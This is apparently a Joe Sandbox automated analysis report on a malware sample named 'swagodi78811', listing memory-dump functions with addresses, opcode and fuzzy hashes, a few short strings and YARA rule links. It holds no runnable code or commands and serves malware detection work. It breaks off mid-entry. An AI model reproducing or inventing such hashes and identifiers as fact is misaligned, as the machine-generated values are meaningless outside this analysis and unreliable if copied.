                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d995a68153680bc7c8957305e301613e5ce3d529125ba1636011654459cd997b
                                                • Instruction ID: d89f05a08faad4db6df49eab8ee96a5ca5e72ae04bbf591830496dc50e4f5c63
                                                • Opcode Fuzzy Hash: d995a68153680bc7c8957305e301613e5ce3d529125ba1636011654459cd997b
                                                • Instruction Fuzzy Hash: A2E01A709052589FC741EFB8A4923ADBFB0AB45200F1140EBC484D7662E6344B85DB92
                                                Function 004222D6 Relevance: .0, Instructions: 20COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2ab281f155cd248d69539e4c2d3a33752dccee49103566bf13097fd8b29ebaf0
                                                • Instruction ID: 5a3623dacfa586e81537e0342be39939bae062b3a4542e0aba6bd6931623ce32
                                                • Opcode Fuzzy Hash: 2ab281f155cd248d69539e4c2d3a33752dccee49103566bf13097fd8b29ebaf0
                                                • Instruction Fuzzy Hash: 05F0AE39A04268DFCB20CF94CD84BE9BBB5FB4D308F1481D9A508A7251C331AE82DF50
                                                Function 00420FA8 Relevance: .0, Instructions: 19COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 49850b6f0ea37dd783cbfc363a7bb2ee0bfef36aff042b6ecf9bcb9295c9cc62
                                                • Instruction ID: 28ae499eaad679c12096f8c978b223b647e0f2b83622c7663ee6d1a0ff47688e
                                                • Opcode Fuzzy Hash: 49850b6f0ea37dd783cbfc363a7bb2ee0bfef36aff042b6ecf9bcb9295c9cc62
                                                • Instruction Fuzzy Hash: 86D01230A8A118D7C714DBA4EA416BDBBBCAF45305F6451AAC84823242C6741A86E686
                                                Function 00422951 Relevance: .0, Instructions: 18COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d798ebc5ea2d77dad310200986533bf3e6c86f38261389012a810476dfa8ca70
                                                • Instruction ID: 177fb2b3afd2521ad60220d0043f3b6a18f73267ca96e7c379d8a09e87b187fa
                                                • Opcode Fuzzy Hash: d798ebc5ea2d77dad310200986533bf3e6c86f38261389012a810476dfa8ca70
                                                • Instruction Fuzzy Hash: 4EE01A70B05265DFCB60CF50E8686ECBBB5FF4A302F402096D44EA2220CB744EC1CE02
                                                Function 00420EA8 Relevance: .0, Instructions: 18COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4d0c748f92129ff16dd7969aa1bea1b36e42c9ba68291d2c182eb36cd4f24578
                                                • Instruction ID: 4361e4ea7e3fc40dcdeba3791eab51faf546993a446e0748fa96ede42ac44223
                                                • Opcode Fuzzy Hash: 4d0c748f92129ff16dd7969aa1bea1b36e42c9ba68291d2c182eb36cd4f24578
                                                • Instruction Fuzzy Hash: F0E0B674A10218DFC740EFA8E58465DBBF4AF48305F2041A9D94897360E7319E84DB81
                                                Function 004205D8 Relevance: .0, Instructions: 17COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 07a5edb0424de505e5aa1f6a851fe0579aca128476c41aba5ef3e5d431430d42
                                                • Instruction ID: 78282a234ce210fb24c349a04370f83be3fc25a1d29126b81a1d9ff8dd785e52
                                                • Opcode Fuzzy Hash: 07a5edb0424de505e5aa1f6a851fe0579aca128476c41aba5ef3e5d431430d42
                                                • Instruction Fuzzy Hash: 42D05E70949118EBD704DFA8E8556AEBBB9BB81304F6041AAC80923341C7B41E95DBDA
                                                Function 004210C8 Relevance: .0, Instructions: 16COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c8452bfdfcca9094ff545d80253e8c1108a74a9ec2c325fbfd54e182a8400fbe
                                                • Instruction ID: bc817589c8534a97629450f836618cbf3eec0a90a78fbf64dd25e25c84df810f
                                                • Opcode Fuzzy Hash: c8452bfdfcca9094ff545d80253e8c1108a74a9ec2c325fbfd54e182a8400fbe
                                                • Instruction Fuzzy Hash: BCD01730D00208EFCB40EFA8E88539DBBB4AB44200F2041AA9848D3350E7305B80CB81
                                                Function 00420948 Relevance: .0, Instructions: 15COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c66ba86d11879b052c3b341e1564665b80e904aef907df03f11fe9066f14eeec
                                                • Instruction ID: 21a3ce07054fee2eb6e5b15ee636da61b112ca76187017821a5902e3afd314f7
                                                • Opcode Fuzzy Hash: c66ba86d11879b052c3b341e1564665b80e904aef907df03f11fe9066f14eeec
                                                • Instruction Fuzzy Hash: DDD05E74901108DFC700DFA9DA1835DBBF8EB04350F1009959808C3201D6304A40E780
                                                Function 00420680 Relevance: .0, Instructions: 15COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 833251d3caea62d060f22fab3ebb80f30e7fb781be46f86ade100734e8f8c27d
                                                • Instruction ID: e79bd6415e889b1cc4bf684fc81d0ef8282851c8e83371f827dc2177e8f621df
                                                • Opcode Fuzzy Hash: 833251d3caea62d060f22fab3ebb80f30e7fb781be46f86ade100734e8f8c27d
                                                • Instruction Fuzzy Hash: 21C01220F6B0248EC700EAA1F1A08FFA2FD5F4A300BA17206982573203CD28D80195CD
                                                Function 00420EE8 Relevance: .0, Instructions: 14COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 86d3d6f276e84de7a201f1c102926863c263a5e9415074e1c435d7fff39d718a
                                                • Instruction ID: af5f27909ef036bdb14415cd037594e159de39f8f116a71f93d6cf4e6569dbf7
                                                • Opcode Fuzzy Hash: 86d3d6f276e84de7a201f1c102926863c263a5e9415074e1c435d7fff39d718a
                                                • Instruction Fuzzy Hash: D3D0C97490120CEFC750DFA8E91875DBBF8EB49355F2445AAE808D3750E7B15E80DB92
                                                Function 00422B90 Relevance: .0, Instructions: 14COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c47fa9a4e0a3857ec774b113c762bc61586150f37504f3e0ac746efef8f7672e
                                                • Instruction ID: 1d08d4c924a669dc573488131bdbdc68dc01179ff24ed647d0cbc81e430ecece
                                                • Opcode Fuzzy Hash: c47fa9a4e0a3857ec774b113c762bc61586150f37504f3e0ac746efef8f7672e
                                                • Instruction Fuzzy Hash: 27D0223090120CEBC314DFA8E40072EB73CEB41308FA000AED40803310CBB65E80C7D4
                                                Function 00421540 Relevance: .0, Instructions: 13COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4659ed75daf1fdae5a99e0aae0e992461197f1482ec645c6ad9444db5665e9d6
                                                • Instruction ID: 12956dcb5d354c28cd11ad85d8afb2b719ec5864dca7efbbf7529417e9386cf1
                                                • Opcode Fuzzy Hash: 4659ed75daf1fdae5a99e0aae0e992461197f1482ec645c6ad9444db5665e9d6
                                                • Instruction Fuzzy Hash: 1EC0127051110CEBC714DF9CE811B6EB76CE781254F50019DD40913250DB711E80E7D5
                                                Function 00420B03 Relevance: .0, Instructions: 11COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f0af51fa7696f32aa0f2d8d30894edf9ed35e1369239164c75fe7a9866bdacb
                                                • Instruction ID: 266c8cc4e2ef015c57022481689f683b1dafb18bac6e08d82a9c74e370495567
                                                • Opcode Fuzzy Hash: 5f0af51fa7696f32aa0f2d8d30894edf9ed35e1369239164c75fe7a9866bdacb
                                                • Instruction Fuzzy Hash: 69C09B35B45118D7CB00DBC4F8550FCF735DBC7233F102062D10D93051876419558655
                                                Function 00420AEB Relevance: .0, Instructions: 11COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1862bd26a8982a16c636f0a8b5ede2dd50d6cf060aea2dcb89b6a822cb8bd874
                                                • Instruction ID: 69389e73824acd92a5e468575d5ce8f121c3c48c333ab332555f176e032b36cb
                                                • Opcode Fuzzy Hash: 1862bd26a8982a16c636f0a8b5ede2dd50d6cf060aea2dcb89b6a822cb8bd874
                                                • Instruction Fuzzy Hash: 0AC01270F05219CFCB18DBE9E081AFDB7F8DB08300B644016D405A2343C6349801DB44
                                                Function 00420861 Relevance: .0, Instructions: 7COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410622935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_420000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 46fff5a0db64adcd6d0bf19a576305565e7acb69d483960ad7d99c559630bb69
                                                • Instruction ID: 0897d5b72597e6baec181eb92bf3f958a8792bd40d9c90cd1107c561836086b8
                                                • Opcode Fuzzy Hash: 46fff5a0db64adcd6d0bf19a576305565e7acb69d483960ad7d99c559630bb69
                                                • Instruction Fuzzy Hash: CEA0121451420843D200574091581606A05E78F242F705501900E00836022C58034902

                                                Non-executed Functions

                                                Function 0028D000 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410592653.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_280000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: X<
                                                • API String ID: 0-1215181335
                                                • Opcode ID: 68f9a10dfaea55908fffedd6edfde1aa6226598befd3c2b8f7b02905444d0883
                                                • Instruction ID: 561930a80d377f1e0fd1e5ace0b4511fc282ca2313a789f51b2ef3a6a621f765
                                                • Opcode Fuzzy Hash: 68f9a10dfaea55908fffedd6edfde1aa6226598befd3c2b8f7b02905444d0883
                                                • Instruction Fuzzy Hash: 97E1FB78E102598FCB14EFA9C580AADFBB2BF89304F248169D815A7396D730AD45CF61
                                                Function 0028D4E8 Relevance: .3, Instructions: 312COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410592653.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_280000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1f11e5744864b141fa9d6bbb75f051775d36411dcd4c1ee52a7bc13148d090ae
                                                • Instruction ID: dfb0ad6e1ca4bc5d7fc3568eea547f852b283b01f2c9c200cf8f786e61f4a0df
                                                • Opcode Fuzzy Hash: 1f11e5744864b141fa9d6bbb75f051775d36411dcd4c1ee52a7bc13148d090ae
                                                • Instruction Fuzzy Hash: AFE10C74E102598FCB14DFA9D580AADFBB2FF89304F248169D815A7396D730AD45CFA0
                                                Function 0028C790 Relevance: .3, Instructions: 312COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410592653.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_280000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 864074906572fba9f7b0b00a4e741aa9b95417f9f5a9461189e2091b8e580fb2
                                                • Instruction ID: 0f61c73aa937c5126c43b8a1eab963db0e863f9cbe57f7f202ec1aca42d53458
                                                • Opcode Fuzzy Hash: 864074906572fba9f7b0b00a4e741aa9b95417f9f5a9461189e2091b8e580fb2
                                                • Instruction Fuzzy Hash: 27E1FC78E112598FCB14EFA9C580AADFBB2FF89304F248169D815A7396D731AD41CF60
                                                Function 0028CBC8 Relevance: .3, Instructions: 312COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410592653.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_280000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4d86c3620875275c394f6fba4959a25f862fe1a124f68c2ba44a53b0013e7b5e
                                                • Instruction ID: 6033b8113347a13a6e22cd17f5ffc554b55003a86451d19212b9f5b58a1d429d
                                                • Opcode Fuzzy Hash: 4d86c3620875275c394f6fba4959a25f862fe1a124f68c2ba44a53b0013e7b5e
                                                • Instruction Fuzzy Hash: DBE11D74E102598FDB14EF99C580AADFBB2FF89304F24816AD515AB396D730AD41CFA0
                                                Function 0028DE90 Relevance: .3, Instructions: 312COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410592653.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_280000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3c5b119f9df35c92ea98f58299cfb1a153e82d7868ff36c01148d4b282d2ac7
                                                • Instruction ID: 42714461d49d86c2d125b586b927ca5dbae5a7bea7acf2bcbbf2cb50d07a134d
                                                • Opcode Fuzzy Hash: a3c5b119f9df35c92ea98f58299cfb1a153e82d7868ff36c01148d4b282d2ac7
                                                • Instruction Fuzzy Hash: 23E11B78E102598FDB14EF99C580AADFBB2FF89304F248169D815AB396D770AD41CF60
                                                Function 0028C774 Relevance: .1, Instructions: 140COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.410592653.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_280000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 79baecf5c40a236f55d868486cda629c47b977e9ad3d5eb8d52687df8cf5f4f4
                                                • Instruction ID: 3b6f5a9f2eb3fce78af4f5f3f8084c8b518ddb701fb83672edfa59c338667fbc
                                                • Opcode Fuzzy Hash: 79baecf5c40a236f55d868486cda629c47b977e9ad3d5eb8d52687df8cf5f4f4
                                                • Instruction Fuzzy Hash: 26516E74E152598FDB18DFA9C5805AEFBF2BF89304F2481AAD408AB356D7319D41CF60

                                                Executed Functions

                                                Function 00209E88 Relevance: 4.3, Strings: 1, Instructions: 3075COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: N
                                                • API String ID: 0-1130791706
                                                • Opcode ID: 4d2655579ca962dfdcd110c2ca82a7bbc2acb70ea759b87eadb0116952d4e5c0
                                                • Instruction ID: eac283680c410bfe0b0c8a449d2e56cf28d9d3b851e7dbf4afdf3fa8abdce4ef
                                                • Opcode Fuzzy Hash: 4d2655579ca962dfdcd110c2ca82a7bbc2acb70ea759b87eadb0116952d4e5c0
                                                • Instruction Fuzzy Hash: 8273F431C10B5A8ECB11EF68C884A99F7B1FF95300F55C69AE44977261EB70AAD4CF42
                                                Function 021B0040 Relevance: 3.5, Strings: 1, Instructions: 2230COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663621415.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_21b0000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: K
                                                • API String ID: 0-856455061
                                                • Opcode ID: eae937a47a97e6444a9edffc38c5ae8ca52945063787132b59e543fa28e95426
                                                • Instruction ID: 2df78deb0e956dbe1b2d93b1714b68df85d51881f00f75c51dc12f5e2cce8343
                                                • Opcode Fuzzy Hash: eae937a47a97e6444a9edffc38c5ae8ca52945063787132b59e543fa28e95426
                                                • Instruction Fuzzy Hash: 8733E031C1461A8ADB11EF68C894ADDF7B1FF99300F55C69AE44C67221EB70AAC5CF81
                                                Function 0020392D Relevance: 3.0, Strings: 2, Instructions: 463COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHp$PHp
                                                • API String ID: 0-4032155144
                                                • Opcode ID: da5b358d075b40a95505e348641a750ffcf4d167e1a4aba4447a53b9d5b30c5e
                                                • Instruction ID: b4b1242ad1ced0b56b54eb47e99222aeeedcac1a497866d36ec503c88b8ca60a
                                                • Opcode Fuzzy Hash: da5b358d075b40a95505e348641a750ffcf4d167e1a4aba4447a53b9d5b30c5e
                                                • Instruction Fuzzy Hash: 1981C774E00658CFDB54DFA9D884A9DBBF2BF89300F14C06AE419AB366DB709945CF50
                                                Function 002044F0 Relevance: 2.7, Strings: 2, Instructions: 194COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHp$PHp
                                                • API String ID: 0-4032155144
                                                • Opcode ID: d702a608b9f50692b0057f7dda61c542db5f63e49c46ed166075a12ed1f65662
                                                • Instruction ID: 4f56dcb2455269847cb433f8243a5b9a2fed38ea1e009ca6e6cd999c31633dc8
                                                • Opcode Fuzzy Hash: d702a608b9f50692b0057f7dda61c542db5f63e49c46ed166075a12ed1f65662
                                                • Instruction Fuzzy Hash: 0A91B7B4D10258CFDB18DFA9D884A9DBBF2BF89300F14C16AE419AB366DB319945CF10
                                                Function 00204D6F Relevance: 2.7, Strings: 2, Instructions: 194COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHp$PHp
                                                • API String ID: 0-4032155144
                                                • Opcode ID: c0848f622c2d5e6210b64bee4371053316f5e25fa79564830b8b56bc8e350ee0
                                                • Instruction ID: 2cf50b550778d2615287c231889b4cb868d855065be029369fbce1eb27b8039b
                                                • Opcode Fuzzy Hash: c0848f622c2d5e6210b64bee4371053316f5e25fa79564830b8b56bc8e350ee0
                                                • Instruction Fuzzy Hash: 7491C6B4E10258CFDB14DFA9D984A9DBBF2BF89300F14C0A9E509AB366DB709945CF10
                                                Function 002047D0 Relevance: 2.7, Strings: 2, Instructions: 189COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHp$PHp
                                                • API String ID: 0-4032155144
                                                • Opcode ID: 2b9d02574e4d8f67f76aab20c84402f39067c8f0ea19e75d62e0b6b94fdc5635
                                                • Instruction ID: ba108f3f57db7047632a82ad8a93e83582668599394d33e39246b509ab125806
                                                • Opcode Fuzzy Hash: 2b9d02574e4d8f67f76aab20c84402f39067c8f0ea19e75d62e0b6b94fdc5635
                                                • Instruction Fuzzy Hash: 0B81C7B4E10258DFDB14DFA9D984A9DBBF2BF89300F14C069E909AB356DB309985CF10
                                                Function 002031B1 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHp$PHp
                                                • API String ID: 0-4032155144
                                                • Opcode ID: 74cfe099b4be6060a0b6cbfc7f79f1c2d84021f918c737c4631e53880ee8ea2e
                                                • Instruction ID: 245308ab3734b481f92b9f6832e03a0e1eee39f50ec1b8cc4cce1c92f6538995
                                                • Opcode Fuzzy Hash: 74cfe099b4be6060a0b6cbfc7f79f1c2d84021f918c737c4631e53880ee8ea2e
                                                • Instruction Fuzzy Hash: D6819574E10258CFDB58DFA9D984A9DBBF2FF89300F1480A9E409AB366DB709945CF50
                                                Function 00204A9F Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHp$PHp
                                                • API String ID: 0-4032155144
                                                • Opcode ID: 699e05b40082dfd0bc69362362e3e02de81b93bece22db3231d385f50742ef5f
                                                • Instruction ID: e56b3d6314ae5a80b6ba4c3ec17cc85edbf1af5ab4eda9c7b686e307dc6f0b13
                                                • Opcode Fuzzy Hash: 699e05b40082dfd0bc69362362e3e02de81b93bece22db3231d385f50742ef5f
                                                • Instruction Fuzzy Hash: 6981B674E11258CFDB58DFA9D884A9DBBF2BF89300F14C06AE409AB366DB309945CF10
                                                Function 00203483 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHp$PHp
                                                • API String ID: 0-4032155144
                                                • Opcode ID: e299372ca77f3801dc765d5d5da9b35b478e046db91a15e2b441ea9fb7e35b6f
                                                • Instruction ID: c65d9ca70fc6f2b77079fe92cb52d8b053d1dcde5ca1a7baea21512ff2bbf75d
                                                • Opcode Fuzzy Hash: e299372ca77f3801dc765d5d5da9b35b478e046db91a15e2b441ea9fb7e35b6f
                                                • Instruction Fuzzy Hash: 7F81C574E00258DFDB18DFA9D984A9DBBF6BF89300F14C069E409AB366DB309995CF10
                                                Function 00203E28 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663083560.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_200000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHp$PHp
                                                • API String ID: 0-4032155144
                                                • Opcode ID: 25ea348f0db4fd46182047ed0ca9aba1e46884104901987a3bb0954be5503c7f
                                                • Instruction ID: 1e958431d54dce4bcf002ccc847816cfb2ecae9bc23dacd984843bf3d0d18e22
                                                • Opcode Fuzzy Hash: 25ea348f0db4fd46182047ed0ca9aba1e46884104901987a3bb0954be5503c7f
                                                • Instruction Fuzzy Hash: E381C574E10258CFDB58DFA9D984A9DBBF2BF89300F14C06AE409AB366DB709945CF10
                                                Function 021B0016 Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663621415.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_21b0000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: K
                                                • API String ID: 0-856455061
                                                • Opcode ID: 4aa85c6f6e42c3f9efdc568e2d238d2c911b0927d698787991d5f1aaf365ce3d
                                                • Instruction ID: d38e3ddc88c564ad172f50e1c38188e6428ea9cadf7a91b138aa1b8ccaa9ab7a
                                                • Opcode Fuzzy Hash: 4aa85c6f6e42c3f9efdc568e2d238d2c911b0927d698787991d5f1aaf365ce3d
                                                • Instruction Fuzzy Hash: EFB12475D046198FDB15DF69C8887DDBBB1FF89300F14C2AAD408AB261EB74AA85CF41
                                                Function 022E0040 Relevance: .7, Instructions: 745COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.663664061.00000000022E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_22e0000_swagodi78811.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2fe091acc9f80c00b79140b1f20a70c9e262b401eeb0a9d45dcc06ffc6159228
                                                • Instruction ID: 8f9140e33ec417d165f37b75ac82995f7a1f51dee77b47f97c56f2d51da74f8e
